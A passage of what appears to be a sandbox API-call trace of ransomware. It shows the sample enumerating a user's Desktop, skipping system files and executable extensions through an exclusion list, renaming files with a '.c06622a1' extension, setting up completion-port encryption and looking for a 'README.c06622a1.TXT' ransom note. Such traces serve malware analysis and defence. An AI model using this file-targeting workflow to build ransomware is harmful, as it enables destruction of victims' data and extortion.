_Str2="WPXZau7ksZL.jpg") returned -21 [0156.280] wcslen (_String="bootsect.bak") returned 0xc [0156.280] _wcsicmp (_Str1="desktop.ini", _Str2="WPXZau7ksZL.jpg") returned -19 [0156.280] wcslen (_String="desktop.ini") returned 0xb [0156.280] _wcsicmp (_Str1="iconcache.db", _Str2="WPXZau7ksZL.jpg") returned -14 [0156.280] wcslen (_String="iconcache.db") returned 0xc [0156.280] _wcsicmp (_Str1="ntldr", _Str2="WPXZau7ksZL.jpg") returned -9 [0156.280] wcslen (_String="ntldr") returned 0x5 [0156.280] _wcsicmp (_Str1="ntuser.dat", _Str2="WPXZau7ksZL.jpg") returned -9 [0156.280] wcslen (_String="ntuser.dat") returned 0xa [0156.280] _wcsicmp (_Str1="ntuser.dat.log", _Str2="WPXZau7ksZL.jpg") returned -9 [0156.280] wcslen (_String="ntuser.dat.log") returned 0xe [0156.280] _wcsicmp (_Str1="ntuser.ini", _Str2="WPXZau7ksZL.jpg") returned -9 [0156.280] wcslen (_String="ntuser.ini") returned 0xa [0156.280] _wcsicmp (_Str1="thumbs.db", _Str2="WPXZau7ksZL.jpg") returned -3 [0156.280] wcslen (_String="thumbs.db") returned 0x9 [0156.280] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0156.280] wcslen (_String="386") returned 0x3 [0156.280] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0156.281] wcslen (_String="adv") returned 0x3 [0156.281] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0156.281] wcslen (_String="ani") returned 0x3 [0156.281] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0156.281] wcslen (_String="bat") returned 0x3 [0156.281] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0156.281] wcslen (_String="bin") returned 0x3 [0156.281] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0156.281] wcslen (_String="cab") returned 0x3 [0156.281] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0156.281] wcslen (_String="cmd") returned 0x3 [0156.281] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0156.281] wcslen (_String="com") returned 0x3 [0156.281] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0156.281] wcslen (_String="cpl") returned 0x3 [0156.281] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0156.281] wcslen (_String="cur") returned 0x3 [0156.281] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0156.281] wcslen (_String="deskthemepack") returned 0xd [0156.281] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0156.281] wcslen (_String="diagcab") returned 0x7 [0156.281] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0156.281] wcslen (_String="diagcfg") returned 0x7 [0156.281] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0156.281] wcslen (_String="diagpkg") returned 0x7 [0156.281] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0156.281] wcslen (_String="dll") returned 0x3 [0156.281] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0156.281] wcslen (_String="drv") returned 0x3 [0156.282] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0156.282] wcslen (_String="exe") returned 0x3 [0156.282] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0156.282] wcslen (_String="hlp") returned 0x3 [0156.282] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0156.282] wcslen (_String="icl") returned 0x3 [0156.282] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0156.282] wcslen (_String="icns") returned 0x4 [0156.282] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0156.282] wcslen (_String="ico") returned 0x3 [0156.282] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0156.282] wcslen (_String="ics") returned 0x3 [0156.282] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0156.282] wcslen (_String="idx") returned 0x3 [0156.282] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0156.282] wcslen (_String="ldf") returned 0x3 [0156.282] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0156.282] wcslen (_String="lnk") returned 0x3 [0156.282] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0156.282] wcslen (_String="mod") returned 0x3 [0156.282] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0156.282] wcslen (_String="mpa") returned 0x3 [0156.282] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0156.282] wcslen (_String="msc") returned 0x3 [0156.282] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0156.282] wcslen (_String="msp") returned 0x3 [0156.282] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0156.282] wcslen (_String="msstyles") returned 0x8 [0156.282] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0156.282] wcslen (_String="msu") returned 0x3 [0156.282] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0156.282] wcslen (_String="nls") returned 0x3 [0156.283] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0156.283] wcslen (_String="nomedia") returned 0x7 [0156.283] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0156.283] wcslen (_String="ocx") returned 0x3 [0156.283] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0156.283] wcslen (_String="prf") returned 0x3 [0156.283] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0156.283] wcslen (_String="ps1") returned 0x3 [0156.283] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0156.283] wcslen (_String="rom") returned 0x3 [0156.283] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0156.283] wcslen (_String="rtp") returned 0x3 [0156.283] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0156.283] wcslen (_String="scr") returned 0x3 [0156.283] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0156.283] wcslen (_String="shs") returned 0x3 [0156.283] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0156.283] wcslen (_String="spl") returned 0x3 [0156.283] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0156.283] wcslen (_String="sys") returned 0x3 [0156.283] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0156.283] wcslen (_String="theme") returned 0x5 [0156.283] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0156.283] wcslen (_String="themepack") returned 0x9 [0156.283] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0156.283] wcslen (_String="wpx") returned 0x3 [0156.283] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0156.283] wcslen (_String="lock") returned 0x4 [0156.283] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0156.283] wcslen (_String="key") returned 0x3 [0156.283] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0156.284] wcslen (_String="hta") returned 0x3 [0156.284] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0156.284] wcslen (_String="msi") returned 0x3 [0156.284] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0156.284] wcslen (_String="pdb") returned 0x3 [0156.284] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0156.284] wcslen (_String="sqlite") returned 0x6 [0156.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.284] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.284] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.284] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.284] wcscpy (in: _Dest=0x208e74, _Source="WPXZau7ksZL.jpg" | out: _Dest="WPXZau7ksZL.jpg") returned="WPXZau7ksZL.jpg" [0156.284] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg", dwFileAttributes=0x80) returned 1 [0156.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpxzau7kszl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0156.284] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.285] ReadFile (in: hFile=0x1f0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.285] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xb1fb256e [0156.285] RtlComputeCrc32 (PartialCrc=0x256e, Buffer=0x32ec24, Length=0x80) returned 0x6f08fd61 [0156.285] RtlComputeCrc32 (PartialCrc=0xfd61, Buffer=0x32ec24, Length=0x80) returned 0x359ed687 [0156.285] RtlComputeCrc32 (PartialCrc=0xd687, Buffer=0x32ec24, Length=0x80) returned 0x1e17f5ed [0156.285] RtlComputeCrc32 (PartialCrc=0xf5ed, Buffer=0x32ec24, Length=0x80) returned 0x672ec5a7 [0156.285] CloseHandle (hObject=0x1f0) returned 1 [0156.285] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.286] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg" [0156.286] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg") returned 0x39 [0156.286] wcscpy (in: _Dest=0x218e9a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.286] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpxzau7kszl.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpxzau7kszl.jpg.c06622a1"), dwFlags=0x8) returned 1 [0156.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPXZau7ksZL.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpxzau7kszl.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0156.293] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.293] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3a20020 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe3b0440 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b26c964 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x26a8d271 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6459efef [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6555d782 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13cf1178 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a56a247 [0156.303] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xaf3e074 [0156.306] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3a20094, Length=0x80) returned 0xc8b7700d [0156.306] RtlComputeCrc32 (PartialCrc=0x700d, Buffer=0x3a20094, Length=0x80) returned 0x91a9f75a [0156.306] RtlComputeCrc32 (PartialCrc=0xf75a, Buffer=0x3a20094, Length=0x80) returned 0x699ee97 [0156.307] RtlComputeCrc32 (PartialCrc=0xee97, Buffer=0x3a20094, Length=0x80) returned 0x6ffd338f [0156.307] RtlComputeCrc32 (PartialCrc=0x338f, Buffer=0x3a20094, Length=0x80) returned 0x1e9fdd8e [0156.307] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a20020) returned 1 [0156.307] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.307] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.307] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8b67e0, ftCreationTime.dwHighDateTime=0x1d5e71f, ftLastAccessTime.dwLowDateTime=0xaa02cb90, ftLastAccessTime.dwHighDateTime=0x1d5dfcc, ftLastWriteTime.dwLowDateTime=0xaa02cb90, ftLastWriteTime.dwHighDateTime=0x1d5dfcc, nFileSizeHigh=0x0, nFileSizeLow=0x10697, dwReserved0=0x0, dwReserved1=0x0, cFileName="X rJVfo28OChLRQXCfhx.ppt", cAlternateFileName="XRJVFO~1.PPT")) returned 1 [0156.307] _wcsicmp (_Str1="X rJVfo28OChLRQXCfhx.ppt", _Str2="README.c06622a1.TXT") returned 6 [0156.307] wcsstr (_Str="X rJVfo28OChLRQXCfhx.ppt", _SubStr="README") returned 0x0 [0156.307] _wcsicmp (_Str1="autorun.inf", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -23 [0156.307] wcslen (_String="autorun.inf") returned 0xb [0156.307] _wcsicmp (_Str1="boot.ini", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -22 [0156.307] wcslen (_String="boot.ini") returned 0x8 [0156.307] _wcsicmp (_Str1="bootfont.bin", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -22 [0156.307] wcslen (_String="bootfont.bin") returned 0xc [0156.307] _wcsicmp (_Str1="bootsect.bak", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -22 [0156.307] wcslen (_String="bootsect.bak") returned 0xc [0156.307] _wcsicmp (_Str1="desktop.ini", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -20 [0156.307] wcslen (_String="desktop.ini") returned 0xb [0156.307] _wcsicmp (_Str1="iconcache.db", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -15 [0156.308] wcslen (_String="iconcache.db") returned 0xc [0156.308] _wcsicmp (_Str1="ntldr", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -10 [0156.308] wcslen (_String="ntldr") returned 0x5 [0156.308] _wcsicmp (_Str1="ntuser.dat", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -10 [0156.308] wcslen (_String="ntuser.dat") returned 0xa [0156.308] _wcsicmp (_Str1="ntuser.dat.log", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -10 [0156.308] wcslen (_String="ntuser.dat.log") returned 0xe [0156.308] _wcsicmp (_Str1="ntuser.ini", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -10 [0156.308] wcslen (_String="ntuser.ini") returned 0xa [0156.308] _wcsicmp (_Str1="thumbs.db", _Str2="X rJVfo28OChLRQXCfhx.ppt") returned -4 [0156.308] wcslen (_String="thumbs.db") returned 0x9 [0156.308] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0156.308] wcslen (_String="386") returned 0x3 [0156.308] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0156.308] wcslen (_String="adv") returned 0x3 [0156.308] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0156.308] wcslen (_String="ani") returned 0x3 [0156.308] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0156.308] wcslen (_String="bat") returned 0x3 [0156.308] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0156.309] wcslen (_String="bin") returned 0x3 [0156.309] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0156.309] wcslen (_String="cab") returned 0x3 [0156.309] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0156.309] wcslen (_String="cmd") returned 0x3 [0156.309] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0156.309] wcslen (_String="com") returned 0x3 [0156.309] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0156.309] wcslen (_String="cpl") returned 0x3 [0156.309] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0156.309] wcslen (_String="cur") returned 0x3 [0156.309] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0156.309] wcslen (_String="deskthemepack") returned 0xd [0156.309] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0156.309] wcslen (_String="diagcab") returned 0x7 [0156.309] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0156.309] wcslen (_String="diagcfg") returned 0x7 [0156.309] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0156.309] wcslen (_String="diagpkg") returned 0x7 [0156.309] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0156.309] wcslen (_String="dll") returned 0x3 [0156.310] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0156.310] wcslen (_String="drv") returned 0x3 [0156.310] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0156.310] wcslen (_String="exe") returned 0x3 [0156.310] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0156.310] wcslen (_String="hlp") returned 0x3 [0156.310] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0156.310] wcslen (_String="icl") returned 0x3 [0156.310] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0156.310] wcslen (_String="icns") returned 0x4 [0156.310] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0156.310] wcslen (_String="ico") returned 0x3 [0156.310] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0156.310] wcslen (_String="ics") returned 0x3 [0156.310] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0156.310] wcslen (_String="idx") returned 0x3 [0156.310] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0156.310] wcslen (_String="ldf") returned 0x3 [0156.310] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0156.310] wcslen (_String="lnk") returned 0x3 [0156.310] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0156.310] wcslen (_String="mod") returned 0x3 [0156.310] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0156.311] wcslen (_String="mpa") returned 0x3 [0156.311] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0156.311] wcslen (_String="msc") returned 0x3 [0156.311] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0156.311] wcslen (_String="msp") returned 0x3 [0156.311] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0156.311] wcslen (_String="msstyles") returned 0x8 [0156.311] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0156.311] wcslen (_String="msu") returned 0x3 [0156.311] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0156.311] wcslen (_String="nls") returned 0x3 [0156.311] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0156.311] wcslen (_String="nomedia") returned 0x7 [0156.311] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0156.311] wcslen (_String="ocx") returned 0x3 [0156.311] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0156.311] wcslen (_String="prf") returned 0x3 [0156.311] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0156.311] wcslen (_String="ps1") returned 0x3 [0156.311] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0156.311] wcslen (_String="rom") returned 0x3 [0156.312] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0156.312] wcslen (_String="rtp") returned 0x3 [0156.312] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0156.312] wcslen (_String="scr") returned 0x3 [0156.312] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0156.312] wcslen (_String="shs") returned 0x3 [0156.312] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0156.312] wcslen (_String="spl") returned 0x3 [0156.312] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0156.312] wcslen (_String="sys") returned 0x3 [0156.312] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0156.312] wcslen (_String="theme") returned 0x5 [0156.312] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0156.312] wcslen (_String="themepack") returned 0x9 [0156.312] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0156.312] wcslen (_String="wpx") returned 0x3 [0156.312] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0156.312] wcslen (_String="lock") returned 0x4 [0156.312] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0156.313] wcslen (_String="key") returned 0x3 [0156.313] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0156.313] wcslen (_String="hta") returned 0x3 [0156.313] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0156.313] wcslen (_String="msi") returned 0x3 [0156.313] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0156.313] wcslen (_String="pdb") returned 0x3 [0156.313] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0156.313] wcslen (_String="sqlite") returned 0x6 [0156.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.313] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.313] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.313] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.313] wcscpy (in: _Dest=0x208e74, _Source="X rJVfo28OChLRQXCfhx.ppt" | out: _Dest="X rJVfo28OChLRQXCfhx.ppt") returned="X rJVfo28OChLRQXCfhx.ppt" [0156.314] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt", dwFileAttributes=0x80) returned 1 [0156.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x rjvfo28ochlrqxcfhx.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0156.320] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.320] ReadFile (in: hFile=0x1bc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.321] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xed2ac765 [0156.321] RtlComputeCrc32 (PartialCrc=0xc765, Buffer=0x32ec24, Length=0x80) returned 0x247054c [0156.321] RtlComputeCrc32 (PartialCrc=0x54c, Buffer=0x32ec24, Length=0x80) returned 0x8700cd2 [0156.321] RtlComputeCrc32 (PartialCrc=0xcd2, Buffer=0x32ec24, Length=0x80) returned 0xdb8af470 [0156.321] RtlComputeCrc32 (PartialCrc=0xf470, Buffer=0x32ec24, Length=0x80) returned 0xa4dbc188 [0156.321] CloseHandle (hObject=0x1bc) returned 1 [0156.321] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.321] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt" [0156.321] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt") returned 0x42 [0156.322] wcscpy (in: _Dest=0x218eac, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.322] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x rjvfo28ochlrqxcfhx.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x rjvfo28ochlrqxcfhx.ppt.c06622a1"), dwFlags=0x8) returned 1 [0156.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\X rJVfo28OChLRQXCfhx.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x rjvfo28ochlrqxcfhx.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0156.333] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.333] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3ab0020 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53fca165 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42458e6 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64967ee2 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64d6546f [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43283631 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d6b13d1 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x441f73d8 [0156.340] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x45e896bb [0156.343] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3ab0094, Length=0x80) returned 0xc278c674 [0156.343] RtlComputeCrc32 (PartialCrc=0xc674, Buffer=0x3ab0094, Length=0x80) returned 0xbfa20e0d [0156.343] RtlComputeCrc32 (PartialCrc=0xe0d, Buffer=0x3ab0094, Length=0x80) returned 0x430e6128 [0156.343] RtlComputeCrc32 (PartialCrc=0x6128, Buffer=0x3ab0094, Length=0x80) returned 0xeeb2b21a [0156.343] RtlComputeCrc32 (PartialCrc=0xb21a, Buffer=0x3ab0094, Length=0x80) returned 0x4084d610 [0156.343] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3ab0020) returned 1 [0156.343] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.343] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) 